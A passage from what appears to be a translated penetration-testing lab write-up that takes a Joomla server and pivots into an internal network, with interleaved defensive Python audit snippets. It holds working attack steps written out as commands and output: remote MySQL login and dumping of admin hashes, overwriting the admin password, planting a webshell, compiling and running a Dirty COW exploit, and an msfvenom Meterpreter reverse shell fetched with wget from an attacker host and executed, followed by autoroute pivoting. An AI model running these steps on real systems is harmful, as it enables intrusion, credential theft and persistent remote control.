LICENSE file found > http://192.168.1.21/components/com_mailto/mailto.xml
Explorable Directory > http://192.168.1.21/components/com_mailto/
Component found: com_media > http://192.168.1.21/index.php?option=com_media
But possibly it is not active or protected
LICENSE file found > http://192.168.1.21/administrator/components/com_media/media.xml
Explorable Directory > http://192.168.1.21/components/com_media/
Explorable Directory > http://192.168.1.21/administrator/components/com_media/
Component found: com_newsfeeds > http://192.168.1.21/index.php?option=com_newsfeeds
LICENSE file found > http://192.168.1.21/administrator/components/com_newsfeeds/newsfeeds.xml
Explorable Directory > http://192.168.1.21/components/com_newsfeeds/
Explorable Directory > http://192.168.1.21/administrator/components/com_newsfeeds/
Component found: com_search > http://192.168.1.21/index.php?option=com_search
LICENSE file found > http://192.168.1.21/administrator/components/com_search/search.xml
Explorable Directory > http://192.168.1.21/components/com_search/
Explorable Directory > http://192.168.1.21/administrator/components/com_search/
Component found: com_users > http://192.168.1.21/index.php?option=com_users
LICENSE file found > http://192.168.1.21/administrator/components/com_users/users.xml
Explorable Directory > http://192.168.1.21/components/com_users/
Explorable Directory > http://192.168.1.21/administrator/components/com_users/
Component found: com_wrapper > http://192.168.1.21/index.php?option=com_wrapper
LICENSE file found > http://192.168.1.21/components/com_wrapper/wrapper.xml
Explorable Directory > http://192.168.1.21/components/com_wrapper/
End Scanner
6. joomscan Perl script
perl joomscan.pl -u 192.168.1.21
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://192.168.1.21 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.9.12
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.1.21/administrator/components
http://192.168.1.21/administrator/modules
http://192.168.1.21/administrator/templates
http://192.168.1.21/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.1.21/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://192.168.1.21/robots.txt
Interesting path found from robots.txt
http://192.168.1.21/joomla/administrator/
http://192.168.1.21/administrator/
http://192.168.1.21/bin/
http://192.168.1.21/cache/
http://192.168.1.21/cli/
http://192.168.1.21/components/
http://192.168.1.21/includes/
http://192.168.1.21/installation/
http://192.168.1.21/language/
http://192.168.1.21/layouts/
http://192.168.1.21/libraries/
http://192.168.1.21/logs/
http://192.168.1.21/modules/
http://192.168.1.21/plugins/
http://192.168.1.21/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config file is found
config file path : http://192.168.1.21/configuration.php~
Your Report : reports/192.168.1.21/
That did not lead anywhere, so the only option left is to log in remotely to the target's MySQL.
MySQL
1. Remote login
┌──(root㉿ru)-[~]
└─# mysql -u testuser -h 192.168.1.21 -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 4306
Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
+--------------------+
2 rows in set (0.001 sec)
2. Viewing sensitive data
MySQL [(none)]> use joomla;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [joomla]> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| am2zu_action_log_config |
| am2zu_action_logs |
| am2zu_action_logs_extensions |
| am2zu_action_logs_users |
| am2zu_assets |
| am2zu_associations |
| am2zu_banner_clients |
| am2zu_banner_tracks |
| am2zu_banners |
| am2zu_categories |
| am2zu_contact_details |
| am2zu_content |
| am2zu_content_frontpage |
| am2zu_content_rating |
| am2zu_content_types |
| am2zu_contentitem_tag_map |
| am2zu_core_log_searches |
| am2zu_extensions |
| am2zu_fields |
| am2zu_fields_categories |
| am2zu_fields_groups |
| am2zu_fields_values |
| am2zu_finder_filters |
| am2zu_finder_links |
| am2zu_finder_links_terms0 |
| am2zu_finder_links_terms1 |
| am2zu_finder_links_terms2 |
| am2zu_finder_links_terms3 |
| am2zu_finder_links_terms4 |
| am2zu_finder_links_terms5 |
| am2zu_finder_links_terms6 |
| am2zu_finder_links_terms7 |
| am2zu_finder_links_terms8 |
| am2zu_finder_links_terms9 |
| am2zu_finder_links_termsa |
| am2zu_finder_links_termsb |
| am2zu_finder_links_termsc |
| am2zu_finder_links_termsd |
| am2zu_finder_links_termse |
| am2zu_finder_links_termsf |
| am2zu_finder_taxonomy |
| am2zu_finder_taxonomy_map |
| am2zu_finder_terms |
| am2zu_finder_terms_common |
| am2zu_finder_tokens |
| am2zu_finder_tokens_aggregate |
| am2zu_finder_types |
| am2zu_languages |
| am2zu_menu |
| am2zu_menu_types |
| am2zu_messages |
| am2zu_messages_cfg |
| am2zu_modules |
| am2zu_modules_menu |
| am2zu_newsfeeds |
| am2zu_overrider |
| am2zu_postinstall_messages |
| am2zu_privacy_consents |
| am2zu_privacy_requests |
| am2zu_redirect_links |
| am2zu_schemas |
| am2zu_session |
| am2zu_tags |
| am2zu_template_styles |
| am2zu_ucm_base |
| am2zu_ucm_content |
| am2zu_ucm_history |
| am2zu_update_sites |
| am2zu_update_sites_extensions |
| am2zu_updates |
| am2zu_user_keys |
| am2zu_user_notes |
| am2zu_user_profiles |
| am2zu_user_usergroup_map |
| am2zu_usergroups |
| am2zu_users |
| am2zu_utf8_conversion |
| am2zu_viewlevels |
| umnbt_action_log_config |
| umnbt_action_logs |
| umnbt_action_logs_extensions |
| umnbt_action_logs_users |
| umnbt_assets |
| umnbt_associations |
| umnbt_banner_clients |
| umnbt_banner_tracks |
| umnbt_banners |
| umnbt_categories |
| umnbt_contact_details |
| umnbt_content |
| umnbt_content_frontpage |
| umnbt_content_rating |
| umnbt_content_types |
| umnbt_contentitem_tag_map |
| umnbt_core_log_searches |
| umnbt_extensions |
| umnbt_fields |
| umnbt_fields_categories |
| umnbt_fields_groups |
| umnbt_fields_values |
| umnbt_finder_filters |
| umnbt_finder_links |
| umnbt_finder_links_terms0 |
| umnbt_finder_links_terms1 |
| umnbt_finder_links_terms2 |
| umnbt_finder_links_terms3 |
| umnbt_finder_links_terms4 |
| umnbt_finder_links_terms5 |
| umnbt_finder_links_terms6 |
| umnbt_finder_links_terms7 |
| umnbt_finder_links_terms8 |
| umnbt_finder_links_terms9 |
| umnbt_finder_links_termsa |
| umnbt_finder_links_termsb |
| umnbt_finder_links_termsc |
| umnbt_finder_links_termsd |
| umnbt_finder_links_termse |
| umnbt_finder_links_termsf |
| umnbt_finder_taxonomy |
| umnbt_finder_taxonomy_map |
| umnbt_finder_terms |
| umnbt_finder_terms_common |
| umnbt_finder_tokens |
| umnbt_finder_tokens_aggregate |
| umnbt_finder_types |
| umnbt_languages |
| umnbt_menu |
| umnbt_menu_types |
| umnbt_messages |
| umnbt_messages_cfg |
| umnbt_modules |
| umnbt_modules_menu |
| umnbt_newsfeeds |
| umnbt_overrider |
| umnbt_postinstall_messages |
| umnbt_privacy_consents |
| umnbt_privacy_requests |
| umnbt_redirect_links |
| umnbt_schemas |
| umnbt_session |
| umnbt_tags |
| umnbt_template_styles |
| umnbt_ucm_base |
| umnbt_ucm_content |
| umnbt_ucm_history |
| umnbt_update_sites |
| umnbt_update_sites_extensions |
| umnbt_updates |
| umnbt_user_keys |
| umnbt_user_notes |
| umnbt_user_profiles |
| umnbt_user_usergroup_map |
| umnbt_usergroups |
| umnbt_users |
| umnbt_utf8_conversion |
| umnbt_viewlevels |
+-------------------------------+
156 rows in set (0.001 sec)
MySQL [joomla]>
MySQL [joomla]> select username,0x3a,password from umnbt_users;
+----------+------+--------------------------------------------------------------+
| username | 0x3a | password |
+----------+------+--------------------------------------------------------------+
| admin | : | $2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy |
+----------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)
MySQL [joomla]> select username,0x3a,password from am2zu_users;
+---------------+------+--------------------------------------------------------------+
| username | 0x3a | password |
+---------------+------+--------------------------------------------------------------+
| administrator | : | $2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy |
+---------------+------+--------------------------------------------------------------+
1 row in set (0.001 sec)
Change it with a MySQL statement:
update am2zu_users set password = md5("root") where id = 891;
Both accounts are marked as Super User in the back end, which suggests they hold the highest privileges. We change the administrator account's password directly to root; the value written must of course be the MD5 hash of root.
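The audit below is an added example (my own code, not from the original write-up and not part of Joomla). It classifies the format of each value in the `#__users.password` column and flags legacy MD5 entries and low bcrypt costs, which is how a defender notices that an administrator hash was overwritten with `md5("root")` as done above. The two bcrypt values are the ones the queries returned; the `AFTER_UPDATE_ROWS` entry is constructed to show what the column holds after the UPDATE.

```python
import hashlib
import re

# Hash formats that can appear in Joomla's #__users.password column.
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")
MD5_SALTED_RE = re.compile(r"^[0-9a-f]{32}:[A-Za-z0-9]{32}$")   # legacy md5(pass+salt):salt
MD5_PLAIN_RE = re.compile(r"^[0-9a-f]{32}$")                    # bare md5(pass)

# Rows as returned by "select username, password from <prefix>_users" above.
PAGE_ROWS = [
    ("admin", "$2y$10$N/Yv/9rzxyq.z0gLTT5og.pj3FFAP8Sq2PcBgsMX/Qnc2671qQkHy"),
    ("administrator", "$2y$10$.Bke7JJThQfzjwpTlilxx.aCg7CmSYbz358LeqjZZhLDak/vv7EDy"),
]
# Constructed: the same table after "update ... set password = md5('root')".
AFTER_UPDATE_ROWS = [
    PAGE_ROWS[0],
    ("administrator", hashlib.md5(b"root").hexdigest()),
]


def classify_hash(stored):
    """Return (scheme, bcrypt_cost) for one stored password value."""
    m = BCRYPT_RE.match(stored)
    if m:
        return "bcrypt", int(m.group(1))
    if MD5_SALTED_RE.match(stored):
        return "md5-salted", None
    if MD5_PLAIN_RE.match(stored):
        return "md5-plain", None
    return "unknown", None


def audit_users(rows, min_cost=10):
    """Return (username, reason) for every row whose hash a defender should act on."""
    findings = []
    for username, stored in rows:
        scheme, cost = classify_hash(stored)
        if scheme == "bcrypt":
            if cost < min_cost:
                findings.append((username, f"bcrypt cost {cost} is below {min_cost}"))
        elif scheme.startswith("md5"):
            findings.append((username, f"legacy {scheme} hash; force a password reset"))
        else:
            findings.append((username, "unrecognised hash format"))
    return findings


if __name__ == "__main__":
    print("before:", audit_users(PAGE_ROWS))
    print("after: ", audit_users(AFTER_UPDATE_ROWS))
```

Joomla 3 still accepts legacy MD5 hashes at login, so a bare 32-hex value in this column is either a very old account or a hash written straight into the database; either way it warrants a reset. Restricting the hosts the `testuser` MySQL account may connect from removes the path that made the rewrite possible in the first place.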
Logging in to the back end
1. Successful login
All logins are done with the administrator user.
2. RCE vulnerability
https://www.cnblogs.com/starci/p/15174896.html
Click "Options" and change the Path to Files Folder to the current directory "./".
Now folders and files under the whole web root can be manipulated, which gives directory traversal.
Here command execution is obtained by modifying a file. We try another approach.
Connecting with AntSword (蚁剑)
1. Writing a shell
According to the material gathered, the default execution path is http://localhost/templates/beez3/*.php
We only need to write the webshell there.
That is the path; we insert the webshell into one of the PHP files that already exists in the back end.
GitHub - HoangKien1020/CVE-2021-23132: com_media allowed paths that are not intended for image uploads to RCE (https://github.com/HoangKien1020/CVE-2021-23132)
The test succeeds, so the webshell can now be written.
2. Bypassing disable_functions
Running commands in AntSword doesn't work; on inspection, many functions are disabled, so a bypass is needed. You can search GitHub for a matching exploit, or use the AntSword plugin to bypass disable_functions.
GitHub - l3m0n/Bypass_Disable_functions_Shell: a shell that breaks through disable_functions in various ways to achieve command execution (https://github.com/l3m0n/Bypass_Disable_functions_Shell)
Both of the above can be tried.
(www-data:/etc) $ netstat -anlpt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44095 ESTABLISHED -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44093 TIME_WAIT -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44094 TIME_WAIT -
The IP we see is 192.168.93.120 rather than 192.168.1.21, which means there is a reverse proxy forwarding our traffic to 192.168.93.120. Now we need to take over the external-facing host: 192.168.93.100 is the host that forwards traffic in from the outside.
In the tmp directory we found the file test.txt, which gives us a username and password.
adduser wwwuser
passwd wwwuser_123Aqx
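The reasoning drawn from the `netstat -anlpt` listing above can be made mechanical. The parser below is an added example (my code, not from the write-up): it reads the listing, reports which services are bound to every interface, works out the host's own address, and flags the case where all connections to port 80 arrive from a single peer, which is what reveals the reverse proxy at 192.168.93.100. `SAMPLE_NETSTAT` is a constructed copy of the lines shown.

```python
import re
from collections import Counter

# Constructed sample mirroring the "netstat -anlpt" listing taken on the web host above.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44095 ESTABLISHED -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44093 TIME_WAIT -
tcp6 0 0 192.168.93.120:80 192.168.93.100:44094 TIME_WAIT -
"""

ROW_RE = re.compile(r"^(tcp6?|udp6?)\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(\S+)")
WILDCARDS = {"0.0.0.0", "::"}


def split_addr(addr):
    """'0.0.0.0:3306' -> ('0.0.0.0', 3306); ':::*' -> ('::', None)."""
    host, _, port = addr.rpartition(":")
    return host, (int(port) if port.isdigit() else None)


def parse_netstat(text):
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue                      # header lines
        proto, local, foreign, state = m.groups()
        lhost, lport = split_addr(local)
        fhost, fport = split_addr(foreign)
        rows.append({"proto": proto, "local_host": lhost, "local_port": lport,
                     "foreign_host": fhost, "foreign_port": fport, "state": state})
    return rows


def exposed_listeners(rows):
    """(proto, port) pairs bound to every interface rather than to localhost."""
    return sorted({(r["proto"], r["local_port"]) for r in rows
                   if r["state"] == "LISTEN" and r["local_host"] in WILDCARDS})


def own_addresses(rows):
    """Concrete local addresses seen in non-listening rows (the host's real IPs)."""
    return sorted({r["local_host"] for r in rows
                   if r["state"] != "LISTEN" and r["local_host"] not in WILDCARDS})


def peers_for_local_port(rows, port):
    """Remote hosts with a connection (any non-LISTEN state) to the given local port."""
    return dict(Counter(r["foreign_host"] for r in rows
                        if r["local_port"] == port and r["state"] != "LISTEN"))


def single_upstream(rows, port=80):
    """If every connection to `port` comes from one address, return it.
    A public web server normally sees many client IPs; one peer for all of
    them is the signature of a reverse proxy or load balancer in front."""
    peers = peers_for_local_port(rows, port)
    return next(iter(peers)) if len(peers) == 1 else None


if __name__ == "__main__":
    rows = parse_netstat(SAMPLE_NETSTAT)
    print("this host:", own_addresses(rows))
    print("listening on all interfaces:", exposed_listeners(rows))
    print("upstream for :80:", single_upstream(rows))
```

`mysqld` bound to 0.0.0.0:3306 is what allowed the remote login in the MySQL section. Unless remote database access is a real requirement, `bind-address = 127.0.0.1` in my.cnf or a host firewall rule on 3306 closes that path, and the grant for `testuser` should be limited to the hosts that need it.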
SSH connection
┌──(root㉿ru)-[~/lianxi]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss wwwuser@192.168.1.21
The authenticity of host '192.168.1.21 (192.168.1.21)' can't be established.
RSA key fingerprint is SHA256:pVIGFsCgpYpKxtt43DtcC9NUBpUvyNCfIitNR9UsPRA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.21' (RSA) to the list of known hosts.
wwwuser@192.168.1.21's password:
Last login: Sun Oct 6 20:24:43 2019 from 192.168.1.122
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ id
uid=500(wwwuser) gid=500(wwwuser) 组=500(wwwuser) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[wwwuser@localhost ~]$
[wwwuser@localhost ~]$ uname -a
Linux localhost.localdomain 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
[wwwuser@localhost ~]$ find / -perm -u=s f 2>/dev/null
[wwwuser@localhost ~]$ find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/ping
/bin/ping6
/bin/su
/bin/umount
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/chage
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/crontab
/usr/bin/sudo
/usr/sbin/usernetctl
/usr/libexec/openssh/ssh-keysign
/usr/libexec/pt_chown
/sbin/pam_timestamp_check
/sbin/unix_chkpwd
[wwwuser@localhost ~]$
Reproducing the Dirty COW privilege escalation and getting a fully interactive shell - 先知社区 (https://xz.aliyun.com/t/9757)
After some exploration, it turns out the host can be escalated through the kernel: its kernel version falls within the range affected by the Dirty COW vulnerability.
Privilege escalation
┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# php -S 0:8080
[Sat Dec 2 17:53:11 2023] PHP 8.2.7 Development Server (http://0:8080) started
[wwwuser@localhost tmp]$ wget http://192.168.1.20:8080/dirty.c
--2019-10-07 10:12:15-- http://192.168.1.20:8080/dirty.c
正在连接 192.168.1.20:8080... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:4815 (4.7K) [text/x-c]
正在保存至: “dirty.c”
100%[======================================>] 4,815 --.-K/s in 0s
2019-10-07 10:12:15 (21.0 MB/s) - 已保存 “dirty.c” [4815/4815])
[wwwuser@localhost tmp]$ ls
dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ chmod +x dirty.c
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ gcc -pthread dirty.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ ./dirty
File /tmp/passwd.bak already exists! Please delete it and run again
[wwwuser@localhost tmp]$ cd /home
[wwwuser@localhost home]$ ls
wwwuser
[wwwuser@localhost home]$ cd wwwuser
[wwwuser@localhost ~]$ ls
[wwwuser@localhost ~]$ cp /tmp/passwd.bak .
[wwwuser@localhost ~]$ ls
passwd.bak
[wwwuser@localhost home]$ cd /tmp
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$ rm passwd.bak
[wwwuser@localhost tmp]$ clear
[wwwuser@localhost tmp]$ ls
dirty dirty.c yum.log
[wwwuser@localhost tmp]$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: (ls)
Complete line:
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash
mmap: 7f18ff557000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'ls'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
[wwwuser@localhost tmp]$
[wwwuser@localhost tmp]$ ls
dirty dirty.c passwd.bak yum.log
[wwwuser@localhost tmp]$
┌──(root㉿ru)-[~/tools/loudong/zangniu]
└─# ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss firefart@192.168.1.21
firefart@192.168.1.21's password:
Last login: Sun Oct 6 20:25:55 2019 from 192.168.1.122
[firefart@localhost ~]# whoami
firefart
[firefart@localhost ~]# cd /root
[firefart@localhost ~]# ls
anaconda-ks.cfg install.log install.log.syslog nginx-1.9.4 nginx-1.9.4.tar.gz
[firefart@localhost ~]# id
uid=0(firefart) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[firefart@localhost ~]#
This concludes the external foothold; privilege escalation via Dirty COW succeeded. The next step is lateral movement.
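Two host checks as an added example (my code, not from the write-up). The `find / -perm -u=s -type f` list above serves as a per-host SUID baseline so that any SUID file added later stands out, and the `/etc/passwd` parser flags exactly what the Dirty COW run leaves behind: a second uid-0 account (`firefart`) that carries its password hash in `/etc/passwd` itself instead of an `x` pointing to `/etc/shadow`. `SAMPLE_PASSWD` and the extra `/opt/app/helper` path are constructed.

```python
# Constructed /etc/passwd snippet: stock entries plus the line the Dirty COW
# exploit reported writing on the target ("firefart:...:0:0:pwned:/root:/bin/bash").
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
wwwuser:x:500:500::/home/wwwuser:/bin/bash
firefart:fiUtQRmTKI0Ek:0:0:pwned:/root:/bin/bash
"""

# The SUID files the find command above listed on this CentOS host, used as the
# approved baseline for that host.
SUID_BASELINE = {
    "/bin/mount", "/bin/fusermount", "/bin/ping", "/bin/ping6", "/bin/su", "/bin/umount",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/passwd", "/usr/bin/chage",
    "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/crontab", "/usr/bin/sudo",
    "/usr/sbin/usernetctl", "/usr/libexec/openssh/ssh-keysign", "/usr/libexec/pt_chown",
    "/sbin/pam_timestamp_check", "/sbin/unix_chkpwd",
}
# Constructed: a later "find / -perm -u=s -type f" result with one extra file.
FOUND_SUID = sorted(SUID_BASELINE) + ["/opt/app/helper"]

NO_HASH_MARKERS = {"x", "*", "!", "!!", ""}


def parse_passwd(text):
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue                      # blank or malformed line
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid),
                        "gecos": gecos, "home": home, "shell": shell})
    return entries


def rogue_root_accounts(entries):
    """(name, reason) for uid-0 accounts other than root and for entries that carry
    a password hash in /etc/passwd itself instead of an 'x' pointing to /etc/shadow."""
    findings = []
    for e in entries:
        if e["uid"] == 0 and e["name"] != "root":
            findings.append((e["name"], "uid 0 account that is not root"))
        if e["pw"] not in NO_HASH_MARKERS:
            findings.append((e["name"], "password hash stored in /etc/passwd"))
    return findings


def unexpected_suid(found):
    """SUID paths not in the baseline."""
    return sorted(set(found) - SUID_BASELINE)


if __name__ == "__main__":
    for name, reason in rogue_root_accounts(parse_passwd(SAMPLE_PASSWD)):
        print(f"{name}: {reason}")
    print("unexpected SUID:", unexpected_suid(FOUND_SUID))
```

The same parse run against the backup the exploit writes to `/tmp/passwd.bak` and against the live file shows the inserted line directly. An auditd watch on writes to `/etc/passwd`, or a file-integrity monitor, reports this as it happens rather than after the fact; patching the kernel is what removes the vulnerability itself.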
Internal network penetration
Lateral movement 1
1. Generating the payload file
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.25 LPORT=1111 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf -o shell.elf
msfvenom is used to generate a Meterpreter reverse shell for Linux x64.
The generated reverse shell is configured to connect the Meterpreter session back to 192.168.1.25 on port 1111.
In addition, the session communication timeout and expiration timeout are both set to 0, meaning the session stays alive until it is explicitly terminated.
-p : specifies the payload
LHOST=192.168.1.25 LPORT=1111 : specify the listening host and port
SessionCommunicationTimeout=0 : sets the session communication timeout to 0
SessionExpirationTimeout=0 : sets the session expiration timeout to 0
-f elf : specifies the output file format
-o shell.elf : writes the output to shell.elf
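The file this command produces is a staged payload: a few hundred bytes (the wget further down reports 250 bytes for shell.elf) whose only job is to fetch the real Meterpreter stage. An added example of my own, not from the write-up or from Metasploit, showing the header-level traits a host scanner can use to single out such files: a minimal ELF with no section header table, a single program header, and a very small size. The heuristics are mine and `build_sample_elf` only fabricates headers for testing; it does not produce a working program.

```python
import struct

# ELF64 header (System V ABI): e_ident[16], e_type, e_machine, e_version, e_entry,
# e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize,
# e_shnum, e_shstrndx.  Little-endian, 64 bytes.
ELF64_HDR = struct.Struct("<16sHHIQQQIHHHHHH")
ET_EXEC, EM_X86_64 = 2, 0x3E


def build_sample_elf(phnum, shnum, shoff, total_size):
    """Construct an x86-64 ELF64 image padded to total_size bytes.

    Constructed test data: only the header fields inspect_elf() reads are
    meaningful; the body is filler, so the result is not a runnable program.
    """
    ident = b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7   # ELFCLASS64, LSB, v1
    hdr = ELF64_HDR.pack(ident, ET_EXEC, EM_X86_64, 1, 0x400078, 64, shoff, 0,
                         64, 56, phnum, 64 if shnum else 0, shnum, 0)
    return hdr + b"\x00" * (total_size - len(hdr))


def inspect_elf(data):
    """Reasons this file looks like a hand-built stager rather than a normally
    linked binary; [] for an ordinary ELF or for non-ELF input."""
    if len(data) < ELF64_HDR.size or data[:4] != b"\x7fELF" or data[4] != 2:
        return []
    (_ident, _type, _machine, _ver, _entry, _phoff, e_shoff, _flags, _ehsize,
     _phentsize, e_phnum, _shentsize, e_shnum, _shstrndx) = ELF64_HDR.unpack_from(data)
    reasons = []
    if e_shnum == 0 and e_shoff == 0:
        # normal toolchains emit a section table even for stripped binaries
        reasons.append("no section header table")
    if e_phnum == 1:
        # a single PT_LOAD segment is typical of hand-built templates
        reasons.append("single program header")
    if len(data) < 1024:
        reasons.append(f"tiny executable ({len(data)} bytes)")
    return reasons


def is_probable_stager(data):
    return len(inspect_elf(data)) >= 2


if __name__ == "__main__":
    stager_like = build_sample_elf(phnum=1, shnum=0, shoff=0, total_size=250)
    normal_like = build_sample_elf(phnum=9, shnum=30, shoff=7000, total_size=8192)
    print(inspect_elf(stager_like))   # three reasons
    print(inspect_elf(normal_like))   # []
```

This is a heuristic, not a signature: a tool run through sstrip trips the same checks, so a hit is a prompt to look at the file's origin and the process tree (a file fetched into /tmp and executed seconds later, as in the transcript below) rather than proof on its own.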
2. Starting the listener
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
lhosts => 192.168.1.25
msf6 exploit(multi/handler) > set lhost 192.168.1.25
lhost => 192.168.1.25
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.25 yes The listen address (an interface may be specified)
LPORT 1111 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
[firefart@localhost tmp]# wget http://192.168.1.25/shell.elf
--2019-10-07 11:03:06-- http://192.168.1.25/shell.elf
正在连接 192.168.1.25:80... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:250 [application/octet-stream]
正在保存至: “shell.elf”
100%[======================================>] 250 --.-K/s in 0s
2019-10-07 11:03:06 (46.8 MB/s) - 已保存 “shell.elf” [250/250])
[firefart@localhost tmp]# ls
dirty dirty.c passwd.bak shell.elf yum.log
[firefart@localhost tmp]# chmod +x shell.elf
[firefart@localhost tmp]# ./shell.elf
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.25:1111
[*] Sending stage (3045348 bytes) to 192.168.1.21
[*] Meterpreter session 1 opened (192.168.1.25:1111 -> 192.168.1.21:36214) at 2023-12-03 09:17:39 +0800
meterpreter > getuid
Server username: firefart
3. Adding an internal route
View the internal subnets
meterpreter > run get_local_subnets // list the local subnet ranges
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Local subnet: 192.168.1.0/255.255.255.0
Local subnet: 192.168.93.0/255.255.255.0
meterpreter > run autoroute -s 192.168.93.0/24 // add the internal route
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.93.0/255.255.255.0...
[+] Added route to 192.168.93.0/255.255.255.0 via 192.168.1.21
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p // show the current Meterpreter routing table
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.93.0 255.255.255.0 Session 1
Lateral movement 2
